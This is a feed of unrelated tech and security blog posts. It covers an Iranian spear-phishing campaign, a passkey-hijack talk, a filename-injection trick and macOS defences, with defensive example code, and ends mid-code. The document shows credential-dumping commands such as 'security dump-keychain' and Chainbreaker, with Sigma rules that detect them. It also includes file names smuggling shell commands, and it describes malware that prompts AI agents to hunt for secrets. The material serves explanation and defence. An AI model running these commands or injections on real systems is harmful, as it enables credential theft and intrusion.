If you have an FFT feature on your scope, that is often useful, too, as you can see the results of several interfering signals mixing together. Hunting down interference is a basic skill if you work with radio, and it’s useful even if you don’t.
The Advanced Project Gemini Concepts That Could Have Been
Looking back on the trajectory leading to Project Apollo and the resulting Moon missions, one can be forgiven for thinking that this was a strict and well-defined plan that was being executed, especially considering the absolute time crunch. The reality is that much of this trajectory was in flux, with the earlier Project Gemini seeing developments towards supplying manned space stations and even its own Moon missions. [Spaceflight Histories] recently examined some of these Advanced Gemini concepts that never came to pass.
In retrospect, some of these seem like an obvious evolution of the program. Given both NASA and the US Air Force's interest in space stations at the time, the fact that an up-sized "Big Gemini" was proposed as a resupply craft makes sense. Not to be confused with the Gemini B, which was a version of the spacecraft that featured an attached laboratory module. Other concepts, like the paraglider landing feature, were found to be too complex and failure prone.
The circumlunar, lunar landing and Apollo rescue concepts were decidedly more ambitious and included a range of alternatives to the Project Apollo missions, which were anything but certain especially after the Apollo 1 disaster. Although little of Advanced Gemini made it even into a prototype stage, it’s still a fascinating glimpse at an alternate reality.
Iran Cyber Army: spear-phishing against governments across half the world (Italy included!)
A recent Cyber Threat Intelligence (CTI) analysis by DREAM has revealed the details of a complex spear-phishing campaign that took place in August 2025. The attack, attributed to an Iran-aligned group known as Homeland Justice, used already compromised infrastructure to reach sensitive targets worldwide. What sets this operation apart is the use of a hijacked e-mail account belonging to the Omani Ministry of Foreign Affairs, which lent the malicious messages a veneer of legitimacy.
The phishing e-mails carried a malicious attachment, a Microsoft Word document, as the first link in the infection chain. Hidden inside the file was a VBA (Visual Basic for Applications) macro written specifically to evade standard security controls. Once triggered, the macro decoded and installed a payload, an executable named sysProcUpdate.exe, which was the core of the attack.
Attack path of the Iran-nexus spear-phishing campaign.
The sysProcUpdate.exe malware was designed to perform detailed reconnaissance of the compromised system. Its main task was to collect system metadata, including configuration details and installed software. This data was encrypted and then transmitted to a command-and-control (C2) server, from which the attackers could manage the campaign and receive the exfiltrated information.
To evade defences and analysis, the attackers used several evasion techniques. They hid their origin by routing traffic through a VPN exit node in Jordan, making them hard to locate. The malicious payload was also written to a file with a .log extension, a format not normally associated with malware, to slip past automated checks. Delays in the code further hampered behavioural analysis systems.
The lure used
The campaign's main targets were diplomatic and governmental institutions across a wide range of regions, including the Middle East, Africa, Europe, Asia and the Americas. In Europe the countries hit were Italy, France, Romania, Spain, the Netherlands, Hungary, Germany, Austria and Sweden. The campaign shows a clear preference for high-value targets, aiming to obtain strategic information through access to the networks of governments and international organisations, which underlines the political or geopolitical nature of the threat.
To mitigate the attack, security experts recommend several technical countermeasures. The first and most immediate is blocking the Indicators of Compromise (IOCs), such as the IP addresses of the C2 servers and the hashes of the malicious files. Another key recommendation is proactive monitoring of suspicious POST requests to the C2 servers and checking for Windows registry changes that may signal malware activity.
The VBA macro execution chain of the campaign.
Other mitigations stress the importance of enforcing macro security settings in Office applications to prevent arbitrary code execution. An in-depth analysis of outbound VPN traffic is also suggested, to identify anomalous data flows. Finally, network segmentation is seen as an effective defence to limit the spread of malware and reduce the impact of similar attacks in future.
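A quick triage routine for two of the artefacts described above, the macro-bearing Word attachment and the payload staged under a .log name, as an added example that is not from the DREAM report: it checks Office Open XML attachments for an embedded VBA project and flags files whose bytes begin with the PE "MZ" header but carry a non-executable extension. The sample files are constructed in memory. The macro check covers only zip-based Office formats (.docx, .docm and friends), so a legacy binary .doc needs a separate OLE parser, and a raw PE header test obviously misses a payload that is stored encoded.

```python
import io
import zipfile

PE_MAGIC = b"MZ"                                   # DOS/PE header bytes
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx"}
OFFICE_ZIP_EXTENSIONS = (".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm")

def has_vba_project(doc_bytes):
    """Office Open XML files are zip containers; an embedded VBA macro project is
    stored as vbaProject.bin (under word/, xl/ or ppt/). Not valid for legacy .doc."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
            return any(n.endswith("vbaProject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False

def is_disguised_pe(name, data):
    """True when the content starts with a PE header but the name's extension is
    one that should never hold an executable (for example .log)."""
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot >= 0 else ""
    return data[:2] == PE_MAGIC and ext not in EXECUTABLE_EXTENSIONS

def triage(files):
    """files: mapping of file name -> bytes. Returns a list of (name, reason)."""
    findings = []
    for name, data in files.items():
        if name.lower().endswith(OFFICE_ZIP_EXTENSIONS) and has_vba_project(data):
            findings.append((name, "Office document carries a VBA project"))
        if is_disguised_pe(name, data):
            findings.append((name, "PE header under a non-executable extension"))
    return findings

def _make_office_zip(with_macro):
    """Constructed stand-in for a Word attachment: a zip with the right entry names.
    A real vbaProject.bin is an OLE compound file, hence the D0 CF 11 E0 prefix."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 12)
    return buf.getvalue()

# Constructed samples: one macro-bearing document, one clean one, a PE image
# hiding under a .log name, and an ordinary log file.
SAMPLE_FILES = {
    "invitation.docm": _make_office_zip(with_macro=True),
    "agenda.docx": _make_office_zip(with_macro=False),
    "update.log": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,
    "service.log": b"2025-08-12 10:00:01 service started\n",
}

if __name__ == "__main__":
    for name, reason in triage(SAMPLE_FILES):
        print(f"{name}: {reason}")
```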
The article "Iran Cyber Army: spear-phishing against governments across half the world (Italy included!)" originally appeared on il blog della sicurezza informatica.
Hackaday Podcast Episode 335: Beer, Toast, and Pi
What happens when you listen in on Elliot Williams and Al Williams? You get a round up of the best of last week’s Hackaday posts, of course. The topics this week range from beer brewing to lightning protection, with a little bit of everything in between.
This week, many problems find solutions. Power drill battery dead? Your car doesn’t have a tire pressure monitor? Does your butter tear up your toast? You can find the answer to these problems, and more, on the Hackaday podcast.
For the can’t miss section, the guys are annoyed that Google wants to lock down their phones, and also talk about measuring liquid levels in outer space.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
Or download in DRM-free MP3 without requiring developer registration.
Episode 335 Show Notes:
News:
- Confirmation Of Record 220 PeV Cosmic Neutrino Hit On Earth
- Tons of entries for the One Hertz challenge!
What’s that Sound?
- Al made short work of the sound this week. See if you can guess and if you can, you might win a coveted Hackaday Podcast T-shirt.
Interesting Hacks of the Week:
- Automated Brewing
- How To Stop Zeus From Toasting Your Pi
- Battery Repair By Reverse Engineering
- Wire Photo Fax Teardown
- JuiceBox Rescue: Freeing Tethered EV Chargers From Corporate Overlords
- RP2040 Assembly Language Mix And Match
Quick Hacks:
- Elliot’s Picks:
- Homebrew Tire Pressure Monitoring System
- Troubled USB Device? This Tool Can Help
- Butta Melta Stops Rock-solid Butter From Tearing Your Toast
- Al’s Picks:
Can’t-Miss Articles:
- The Browser Wasn’t Enough, Google Wants To Control All Your Software
- Where There Is No Down: Measuring Liquid Levels In Space
China unveils KylinOS 11 with built-in AI: the national operating system meant to replace Windows
China has unveiled KylinOS 11, the largest update to its national operating system, which the government has described as a major step towards an independent technology ecosystem. The new version runs on Linux kernel 6.6 and supports AMD and Intel processors as well as eight Chinese CPUs, many of which use proprietary instruction set architectures. The system also supports seven domestic graphics cards and can work with AMD and Nvidia accelerators.
The launch covered the desktop and server editions at once, adding a built-in AI assistant, support for the Model Context Protocol, cloud integration and enhanced security features.
According to KylinSoft chairman Chen Zhihua, KylinOS is already the most widely used domestic operating system in China, with 16 million installations. That is a modest share nationally, but state media described the launch as a shift from a "functional support platform" to an "intelligent connection base".
Interestingly, the choice of kernel may raise questions. Version 6.6 received LTS status in 2023, but its support ends in December 2026, just 16 months after the release of KylinOS 11.
This is nothing new for the developers, however: the previous KylinOS 10, released in 2020, was based on kernel 4.19, whose support ended in 2024, long before the system itself was retired.
The presentation of KylinOS 11 was a major event for China's IT industry.
During the event, representatives of the country's leading technology companies publicly pledged to support the distribution and deployment of the new version of the operating system.
At the same time, The Register noted that there is still no information on KylinOS 11 support for the domestic alternatives to Bluetooth and HDMI that China proposed last year. Their integration may be a task for future releases.
The article "China unveils KylinOS 11 with built-in AI: the national operating system meant to replace Windows" originally appeared on il blog della sicurezza informatica.
Breakout Boards for the Blind
Connecting an LED to a battery seems trivial. If you have any knowledge of using breadboards, knowing that red goes with red, and that black goes with black, it’s as easy as tying your shoes. Except there’s one problem: what if you can’t see the difference between red and black? [Tara] had a student who struggled with a problem just like this, so of course, they made a whole suite of breakout boards to the rescue!
Breadboards rely almost completely on the visual cues of rows, columns, and if the part is even in the hole correctly. [Tara] fixed these issues while attempting to keep the usefulness of a breadboard. Using tactile cues rather than the traditional visual, a visually impaired individual can figure out what is positive or negative.
Braille is the obvious choice for general communication of inputs and outputs. Where [Tara]’s ingenuity came in was the method of incorporating Braille into the boards — solder joints. After reading a Hackaday article on solder Braille, [Tara] managed a fitting and efficient method of allowing ease of use.
Currently, the boards are in a prototyping stage; however, if you want to try them out yourself early, let [Tara] know. Others with visual impairments are needed to properly stress test the device. If you are someone who does not struggle with any major visual impairments, it can be hard to put yourself in their shoes. For those empathic (and with VR capabilities) among us, be sure to try it yourself!
This Week in Security: DEF CON Nonsense, Vibepwned, and 0-days
DEF CON happened just a few weeks ago, and it’s time to cover some of the interesting talks. This year there were two talks in particular that are notable for being controversial. Coincidentally both of these were from Track 3. The first was the Passkeys Pwned, a talk by SquareX about how the passkey process can be hijacked by malware.
[Dan Goodin] lays out both the details on Passkeys, and why the work from SquareX isn't the major vulnerability that they claim it is. First, what is a Passkey? Technically it's a public/private keypair held by the user's authenticator (the browser, the OS, or a password manager). A unique keypair is generated for each new website, and the site stores the public key. To authenticate with the Passkey, the site generates a random challenge, the authenticator signs it with the private key, and the site checks the signature against the public key. I stand by my earlier opinion, that Passkeys are effectively just passwords, but with all the best-practices mandated.
So what is the claim presented at DEF CON? Malicious code running in the context of the browser tab can hijack the passkey process. In the demonstrated attack flow, a browser extension caused the Passkey login to fail, and prompted the user to generate a new Passkey. This is an interesting observation, and a clever attack against Passkeys, but is not a vulnerability in the Passkey spec. Or more accurately, it’s an accepted limitation of Passkeys, that they cannot guarantee security in the presence of a compromised browser.
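The flow in the two paragraphs above, as an added example that is not part of the SquareX talk, [Dan Goodin]'s write-up or any WebAuthn implementation: a toy Schnorr-style signature over a tiny prime-order group stands in for the real keypair (the parameters are chosen for readability and are nowhere near secure), the relying party stores one public key per user and verifies signatures over (challenge, rpId), and a simulated malicious extension first breaks a login and then answers the re-registration it provoked with its own key. The class names, the user "alice", and the domains example.com and examp1e.com are this example's own.

```python
import hashlib
import secrets

# Toy Schnorr-style signature over a tiny prime-order subgroup. It stands in for
# the real WebAuthn keypair only to make the message flow concrete: the group is
# far too small to be secure and nothing here is actual WebAuthn code.
P = 1019   # safe prime, P = 2*Q + 1
Q = 509    # prime order of the subgroup generated by G
G = 4      # 2^2 mod P, so it generates the order-Q subgroup

def keygen():
    x = secrets.randbelow(Q - 1) + 1
    return x, pow(G, x, P)

def _hash(r, rp_id, challenge):
    data = f"{r}|{rp_id}|{challenge}".encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big")

def sign(priv, rp_id, challenge):
    """The signature binds the relying-party id as well as the challenge, the way
    the rpId hash in WebAuthn authenticator data does."""
    k = secrets.randbelow(Q - 1) + 1
    r = pow(G, k, P)
    e = _hash(r, rp_id, challenge)
    return e, (k - priv * e) % Q

def verify(pub, rp_id, challenge, sig):
    e, s = sig
    r = (pow(G, s, P) * pow(pub, e, P)) % P   # g^s * y^e == g^k for a valid sig
    return _hash(r, rp_id, challenge) == e

class RelyingParty:
    """Server side: one public key per user; (re)registration replaces it."""
    def __init__(self, rp_id):
        self.rp_id, self.keys = rp_id, {}
    def register(self, user, pub):
        self.keys[user] = pub
    def challenge(self):
        return secrets.token_hex(16)
    def login(self, user, challenge, sig):
        pub = self.keys.get(user)
        return pub is not None and verify(pub, self.rp_id, challenge, sig)

class Authenticator:
    """User side: private keys indexed by (rp_id, user) and never exported."""
    def __init__(self):
        self.keys = {}
    def create(self, rp_id, user):
        priv, pub = keygen()
        self.keys[(rp_id, user)] = priv
        return pub
    def get(self, rp_id, user, challenge):
        return sign(self.keys[(rp_id, user)], rp_id, challenge)

def demo_attack(rp_id="example.com", user="alice"):
    """Returns (honest login ok, login ok after extension tampering,
    attacker login ok after the substituted re-registration, victim login ok after)."""
    rp, auth = RelyingParty(rp_id), Authenticator()
    rp.register(user, auth.create(rp_id, user))

    ch = rp.challenge()
    honest = rp.login(user, ch, auth.get(rp_id, user, ch))

    # Malicious extension running in the page: it corrupts the assertion so the
    # login fails and the site falls back to "create a new passkey".
    ch = rp.challenge()
    e, s = auth.get(rp_id, user, ch)
    tampered = rp.login(user, ch, (e, (s + 1) % Q))

    # The extension answers the re-registration with a key it generated itself
    # (the toy group is tiny, so make sure it really differs from the victim's).
    attacker_priv, attacker_pub = keygen()
    while attacker_pub == rp.keys[user]:
        attacker_priv, attacker_pub = keygen()
    rp.register(user, attacker_pub)
    ch = rp.challenge()
    attacker = rp.login(user, ch, sign(attacker_priv, rp_id, ch))

    ch = rp.challenge()
    victim = rp.login(user, ch, auth.get(rp_id, user, ch))
    return honest, tampered, attacker, victim

def phishing_relay_works(rp_id="example.com", phish_id="examp1e.com", user="alice"):
    """A phishing site obtains a signature over its own id and relays it to the real
    site; the rp_id binding makes it fail even without a compromised client."""
    rp, auth = RelyingParty(rp_id), Authenticator()
    rp.register(user, auth.create(rp_id, user))
    auth.keys[(phish_id, user)] = auth.keys[(rp_id, user)]   # worst case: same key
    ch = rp.challenge()
    return rp.login(user, ch, auth.get(phish_id, user, ch))
```

The last two results of `demo_attack` are the whole argument: the relying party only ever saw well-formed registration and assertion messages, so what failed was the client, not the protocol, while `phishing_relay_works` shows the property Passkeys do guarantee, that a signature obtained by a look-alike domain is useless against the real one.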
That Wasn’t the Sketchiest DEF CON Talk
There was another suspect presentation: A talk on DragonSlayer, a framework to de-obfuscate virtualized malware. This topic is super interesting, diving into the world of highly obfuscated malware. Imagine a binary that internally implements an interpreter that runs the actual program code from a bytecode format. As a researcher, this sort of obfuscation is very time consuming to wade through.
The approach from DragonSlayer is to observe the malware, look for known patterns, and feed the observations into a machine learning tool.
If that sounds a bit like the meme whose steps go 1) AI, 2) ???, 3) Profit, you aren't alone, and this is where we get to the reaction from at least part of the security community. The term "AI slop" is being thrown around. The repository doesn't compile, portions of the code are no-ops with comments about what the real code would look like, and some recent commits look like attempts to remove the tell-tale signs of AI authorship.
Ransomware in the cloud
There’s a new trend in ransomware attacks, to move away from on-premise and encryption, and to instead attack cloud data. This is based on a report from Microsoft, detailing the activities of Storm-0501. That threat actor has begun chaining on-premises attacks into Azure takeover.
Azure has plenty of bandwidth, and an attacker isn’t on the hook to pay for it, so the approach here is to firehose all of that data off-site, and then delete every scrap possible. In cases where the permissions don’t allow deletion, new keys are created, proving that the encryption approach isn’t dead yet.
AI Malware
Let’s talk AI Malware. Up first is PromptLock, a find by ESET. Rather than being found in an active exploit, ESET researchers found this as an upload to VirusTotal, and suspect that it’s a proof of concept.
That concept is to skip shellcode, and instead just include malicious prompts in the malware. Upon execution, the malware sends the embedded prompts off to an Ollama API, and asks for malicious Lua code back.
PromptLock seemed like a proof of concept, but there was a different, live malware campaign this week, that made use of a compromised nx library delivered via npm. This one creates a repository named s1ngularity-repository if it’s running in a GitHub context. It also looks for Claude or Gemini on the system, and if found, runs a malicious prompt instructing the agentic LLM to look for local secrets.
0-days
Pssst, hey kid, I hear you like 0-days. We’ve got 0-days this week. First up, FreePBX. The administrative control panel has a flaw that allows an attacker to run any command as the underlying Asterisk user. The earliest that this attack has been seen in logs was August 21, and any FreePBX system with the admin panel exposed to the Internet could be compromised.
Researchers at watchTowr caught wind of a vulnerability in CrushFTP that allowed attackers admin access to the server over HTTPS. This one was being exploited in the wild even before the patch was released. Rather than do their normal patch reverse engineering, the watchTowr team put their Attacker Eye honeypot to work. They added a CrushFTP module to the mix, and sat back to wait for the incoming attack. The Internet didn't disappoint, and it turns out this is a very odd race condition between login attempts.
The Passwordstate credentials manager also has a pair of vulnerabilities fixed in a recent update, though it doesn’t appear that they are actually 0-days, nor yet exploited in the wild. This one seems to allow unauthorized access to the administrative interface via the Emergency Access page.
Bits and Bytes
Trail of Bits performed a security assessment of the WhatsApp apps and backend infrastructure. They found about 28 separate issues, with the most serious getting fixed. Kudos to Meta and Trail of Bits for publishing the whole report.
And finally, there’s a clever technique showing up on Linux malware. Encoding a malicious command as part of the filename. The attack starts with a .rar. It drops a file with the malicious name, with the hope that it will be processed by a backup or similar script. The end-game is a rootkit with remote access. Be careful what you download!
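The mechanism behind that filename trick, as an added example that is not from the report or the malware itself: a backup helper that splices file names into a shell command string, next to the argv-list form that never touches a shell; a tokenizer-based check (nothing is executed) showing how many commands a POSIX shell would see in each; and a scan of a constructed directory listing for names carrying shell syntax. The file names and the /backup path are made up for the demo.

```python
import re
import shlex

# Shell syntax inside a file name is what this technique relies on: if the name is
# pasted into a command string, the shell parses it as part of the command line.
# Command substitution with $(...) or backticks is not a command separator, so it
# is caught by this pattern rather than by the separator count below.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

def backup_command_unsafe(name):
    """Vulnerable pattern: the name becomes part of a string later run through a
    shell (os.system or shell=True), so 'data.csv; touch /tmp/pwned' is two commands."""
    return f"tar -czf /backup/archive.tgz {name}"

def backup_command_safe(name):
    """Hardened pattern: an argv list that never passes through a shell. The '--'
    also stops a name beginning with '-' from being parsed as a tar option."""
    return ["tar", "-czf", "/backup/archive.tgz", "--", name]

def shell_commands_in(cmdline):
    """Count the separate commands a POSIX shell would see in a command string.
    shlex's punctuation-aware tokenizer splits ; | & outside quotes; nothing runs."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    tokens = list(lexer)
    separators = sum(1 for t in tokens if t in (";", "|", "&", "&&", "||"))
    return separators + 1

def command_counts(name):
    """(commands in the unsafe string, commands in the quoted argv form)."""
    return (shell_commands_in(backup_command_unsafe(name)),
            shell_commands_in(shlex.join(backup_command_safe(name))))

def suspicious_names(listing):
    """Entries from a directory listing whose names carry shell syntax; a cheap
    detection to run over backup staging areas and download directories."""
    return [n for n in listing if SHELL_META.search(n)]

# Constructed directory listing for the demo; the last two names are the kind a
# dropper leaves behind, with a second command hidden inside the name.
SAMPLE_LISTING = [
    "report-2025-08.txt",
    "notes.md",
    "data.csv; touch /tmp/pwned",
    "archive$(id).tar",
]

if __name__ == "__main__":
    for n in SAMPLE_LISTING:
        print(n, command_counts(n))
    print("suspicious:", suspicious_names(SAMPLE_LISTING))
```

The same audit applies to cron jobs and log-rotation scripts that glob a directory and hand the result to `sh -c`: every place a name crosses into a shell string is a place a downloaded archive can plant a command.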
The Dawn supercomputer takes the field against cancer: a new era of research together with AI
The project "A foundation model for cancer vaccine design" has been selected for an award by the UK government's prestigious AI Research Resource (AIRR) initiative, led by the Department for Science, Innovation and Technology (DSIT) and UK Research and Innovation (UKRI).
The project will receive 10,000 GPU hours on the Dawn supercomputer, one of the fastest AI supercomputers in the UK.
Dr Lennard Lee, Associate Professor at the Centre for Immuno-Oncology and co-lead of the project, said:
"We believe Oxford can lead a new era of discovery in cancer care, making treatments safer, more precise and more effective through the use of cutting-edge technologies. Cancer vaccine design faces one of the biggest bottlenecks in development: access to high-performance computing infrastructure. With one of the UK's fastest AI supercomputers now at our disposal, discoveries that once took years could now take just weeks."
Michael Bryan, PhD student at the Centre for Immuno-Oncology, said:
"It is a real privilege to work at Oxford with the support of Cancer Research UK. Our team is developing specialised AI foundation models to accelerate the discovery of targets for life-saving cancer vaccines."
The project, run by the Nuffield Department of Medicine, will use publicly available tumour datasets to make discoveries across multiple cancer subtypes and contribute to the Oxford Neoantigen Atlas, an open-access platform supporting cancer vaccine research across the UK.
This work is part of a broader national effort to accelerate the UK's scientific capabilities, transformed by access to AI supercomputing power, to usher in a new era of immunology and vaccine discovery.
The AIRR programme, led by DSIT and UKRI, is investing more than £1 billion to increase national compute capacity twentyfold by 2030, enabling bold, data-driven research in the public and private sectors. This award aligns Oxford's scientists with the government's ambition to make Britain a global leader in AI, science and health innovation.
The article "The Dawn supercomputer takes the field against cancer: a new era of research together with AI" originally appeared on il blog della sicurezza informatica.
No Die? No Problem: RealDice.org Has You Covered
Have you ever been out and about and needed to make a check against INT, WIS or CON but not had a die handy? Sure, you could use an app on your phone, but who knows what pseudorandom nonsense that’s getting up to. [Lazy Hovercraft] has got the solution with his new site RealDice.org, which, well, rolls real dice.
Well, one die, anyway. The webpage presents a button to roll a single twenty-sided die, or “Dee-Twenty” as the cool kids are calling it these days. The rolling is provided by a unit purchased from Amazon that spins the die inside a plastic bubble, similar to this unit we covered back in 2020. (Alas for fans of the venerable game Trouble, it does not pop.) The die spinner’s button has been replaced by a relay, which is triggered from the server whenever a user hits the “roll” button.
You currently have to look at the camera feed with your own eyes to learn what number was rolled, but [Lazy Hovercraft] assures us that titanic effort will be automated once he has a computer-vision model trained. To that end you are encouraged to help build the dataset by punching in what number is shown on the die.
This is a fun little hack to get some physical randomness, and would be great for the sort of chatroom tabletop gaming that’s so common these days. It may also become the new way we select the What’s That Sound? winners on the Hackaday Podcast.
Before sitting down for a game session, you might want to make sure you're all using fair dice. No matter how fair the dice, it's hard to beat quantum phenomena for random noise.
How attackers adapt to built-in macOS protection
If a system is popular with users, you can bet it’s just as popular with cybercriminals. Although Windows still dominates, second place belongs to macOS. And this makes it a viable target for attackers.
With its various built-in protection mechanisms, macOS provides fairly comprehensive end-to-end security for the end user. This post looks at how some of them work, with examples of common attack vectors and ways of detecting and thwarting them.
Overview of macOS security mechanisms
Let’s start by outlining the set of security mechanisms in macOS with a brief description of each:
- Keychain – default password manager
- TCC – application access control
- SIP – protects the integrity of critical system directories and processes against tampering, even by administrators
- File Quarantine – protection against launching suspicious files downloaded from the internet
- Gatekeeper – ensures only trusted applications are allowed to run
- XProtect – signature-based anti-malware protection in macOS
- XProtect Remediator – tool for automatic response to threats detected by XProtect
Keychain
Introduced back in 1999, the password manager for macOS remains a key component in the Apple security framework. It provides centralized and secure storage of all kinds of secrets: from certificates and encryption keys to passwords and credentials. All user accounts and passwords are stored in Keychain by default. Access to the data is protected by a master password.
Keychain files are located in the directories ~/Library/Keychains/, /Library/Keychains/ and /Network/Library/Keychains/. Besides the master password, each of them can be protected with its own key. By default, only owners of the corresponding Keychain copy and administrators have access to these files. In addition, the files are encrypted using the reliable AES-256-GCM algorithm. This guarantees a high level of protection, even in the event of physical access to the system.
However, attacks on the macOS password manager still occur. There are specialized utilities, such as Chainbreaker, designed to extract data from Keychain files. With access to the file itself and its password, Chainbreaker allows an attacker to do a local analysis and full data decryption without being tied to the victim’s device. What’s more, native macOS tools such as the Keychain Access GUI application or the /usr/bin/security command-line utility can be used for malicious purposes if the system is already compromised.
So while the Keychain architecture provides robust protection, it is still vital to control local access, protect the master password, and minimize the risk of data leakage outside the system. Below is an example of a Chainbreaker command:
python -m chainbreaker -pa test_keychain.keychain -o output
As mentioned above, the security utility can be used to manage Keychain from the command line, specifically with the following commands:
security list-keychains – displays all available Keychain files
Keychain files available to the user
security dump-keychain -a -d – dumps all Keychain files
security dump-keychain ~/Library/Keychains/login.keychain-db – dumps a specific Keychain file (a user file is shown as an example)
To detect attacks of this type, you need to configure logging of process startup events. The best way to do this is with the built-in macOS logging mechanism, the Endpoint Security Framework (ESF). This allows you to collect the events needed for building detection logic. Collection of the necessary events using this mechanism is already implemented and configured in Kaspersky Endpoint Detection and Response (KEDR).
Among the events necessary for detecting the described activity are those containing the security dump-keychain and security list-keychains commands, since such activity is not regular for ordinary macOS users. Below is an example of an EDR triggering on a Keychain dump event, as well as an example of a detection rule.
Example of an event from Kaspersky EDR
Sigma:
title: Keychain access
description: This rule detects dumping of keychain
tags:
    - attack.credential-access
    - attack.t1555.001
logsource:
    category: process_creation
    product: macos
detection:
    selection_bin:
        cmdline|contains: 'security'
    selection_args:
        cmdline|contains:
            - 'list-keychains'
            - 'dump-keychain'
    condition: selection_bin and selection_args
falsepositives:
    - Unknown
level: medium
SIP
System Integrity Protection (SIP) is one of the most important macOS security mechanisms, which is designed to prevent unauthorized interference in critical system files and processes, even by users with administrative rights. First introduced in OS X 10.11 El Capitan, SIP marked a significant step toward strengthening security by limiting the ability to modify system components, safeguarding against potential malicious influence.
The mechanism protects files and directories by assigning special attributes that block content modification for everyone except trusted system processes, which are inaccessible to users and third-party software. In particular, this makes it difficult to inject malicious components into these files. The following directories are SIP-protected by default:
/System
/sbin
/bin
/usr (except /usr/local)
/Applications (preinstalled applications)
/Library/Application Support/com.apple.TCC
A full list of protected directories is in the configuration file /System/Library/Sandbox/rootless.conf. These are primarily system files and preinstalled applications, but SIP allows adding extra paths.
SIP provides a high level of protection for system components, but if there is physical access to the system or administrator rights are compromised, SIP can be disabled – but only by restarting the system in Recovery Mode and then running the csrutil disable command in the terminal. To check the current status of SIP, use the csrutil status command.
Output of the csrutil status command
To detect this activity, you need to monitor the csrutil status command. Attackers often check the SIP status to find available options. Because they deploy csrutil disable in Recovery Mode before any monitoring solutions are loaded, this command is not logged and so there is no point in tracking its execution. Instead, you can set up SIP status monitoring, and if the status changes, send a security alert.
Example of an event from Kaspersky EDR
Sigma:
title: SIP status discovery
description: This rule detects SIP status discovery
tags:
    - attack.discovery
    - attack.t1518.001
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        cmdline|contains: 'csrutil status'
    condition: selection
falsepositives:
    - Unknown
level: low
TCC
macOS includes the Transparency, Consent and Control (TCC) framework, which ensures transparency of applications by requiring explicit user consent to access sensitive data and system functions. TCC is structured on SQLite databases (TCC.db), located both in shared directories (/Library/Application Support/com.apple.TCC/TCC.db) and in individual user directories (/Users/<username>/Library/Application Support/com.apple.TCC/TCC.db).
Contents of a table in the TCC database
The integrity of these databases and protection against unauthorized access are implemented using SIP, making it impossible to modify them directly. To interfere with these databases, an attacker must either disable SIP or gain access to a trusted system process. This renders TCC highly resistant to interference and manipulation.
TCC works as follows: whenever an application accesses a sensitive function (camera, microphone, geolocation, Full Disk Access, input control, etc.) for the first time, an interactive window appears with a request for user confirmation. This allows the user to control the extension of privileges.
A potential vector for bypassing this mechanism is TCC Clickjacking – a technique that superimposes a visually altered window on top of the permissions request window, hiding the true nature of the request. The unsuspecting user clicks the button and grants permissions to malware. Although this technique does not exploit TCC itself, it gives attackers access to sensitive system functions, regardless of the level of protection.
Example of a superimposed window
Attackers are interested in obtaining Full Disk Access or Accessibility rights, as these permissions grant virtually unlimited access to the system. Therefore, monitoring changes to TCC.db and managing sensitive privileges remain vital tasks for ensuring comprehensive macOS security.
File Quarantine
File Quarantine is a built-in macOS security feature, first introduced in OS X 10.5 Tiger. It improves system security when handling files downloaded from external sources. This mechanism is analogous to the Mark-of-the-Web feature in Windows: it warns users of potential danger before a downloaded file is run.
Files downloaded through a browser or another application that works with File Quarantine are assigned a special extended attribute (com.apple.quarantine). When such a file is run for the first time, if it has a valid signature and does not arouse Gatekeeper’s suspicion (see below), the user is prompted to confirm the action. This helps prevent running malware by accident.
Example of file attributes that include the quarantine attribute
To get detailed information about the com.apple.quarantine attribute, use the xattr -p com.apple.quarantine <File name> command. The screenshot below shows an example of the output of this command:
The value consists of four semicolon-separated fields:
0083 – flags for further Gatekeeper actions
689cb865 – timestamp in hexadecimal format (Mac Absolute Time)
Safari – browser used to download the file
66EA7FA5-1F9E-4779-A5B5-9CCA2A4A98F5 – UUID attached to this file, used to look up the file’s record in the quarantine events database
Detailed information about the com.apple.quarantine attribute
The information returned by this command is stored in a database located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2, where it can be audited.
Data in the com.apple.LaunchServices.QuarantineEventsV2 database
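As an added example (not code from the original post), the following Python decodes the attribute value that xattr -p prints into its four fields, so the agent, download time and event UUID can be pulled out programmatically during an investigation. The sample value is constructed to mirror the fields in the screenshot above; the one assumption this example makes is that the timestamp field is read as hexadecimal seconds since the Unix epoch, under which reading 689cb865 decodes to 2025-08-13 16:08:05 UTC.

```python
"""Decode the com.apple.quarantine extended attribute (added example).

Parses the 'flags;timestamp;agent;uuid' value that
`xattr -p com.apple.quarantine <file>` prints and can also read it from a
file via the xattr tool on macOS. The sample value is constructed to mirror
the fields described in the post. Assumption (this example's, not the
post's): the timestamp field is decoded as hexadecimal seconds since the
Unix epoch.
"""
import subprocess
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

QUARANTINE_XATTR = "com.apple.quarantine"


@dataclass
class QuarantineInfo:
    flags: int                      # flag word consumed by Gatekeeper (0x0083 in the sample)
    timestamp: Optional[datetime]   # download time decoded from the hex field
    agent: str                      # application that downloaded the file, e.g. Safari
    event_id: str                   # UUID keying the file's record in QuarantineEventsV2


def parse_quarantine_value(value: str) -> QuarantineInfo:
    """Split a raw attribute value into its four fields.

    Some writers emit only the first three fields, so missing trailing fields
    become an empty string (or None for the timestamp) instead of an error.
    """
    parts = value.strip().split(";")
    if len(parts) < 2 or not parts[0]:
        raise ValueError(f"not a quarantine attribute value: {value!r}")
    parts += [""] * (4 - len(parts))          # pad to flags, time, agent, uuid
    flags = int(parts[0], 16)
    timestamp = None
    if parts[1]:
        timestamp = datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc)
    return QuarantineInfo(flags=flags, timestamp=timestamp,
                          agent=parts[2], event_id=parts[3])


def read_quarantine(path: str) -> Optional[QuarantineInfo]:
    """Read and parse the attribute from a file using the xattr command.

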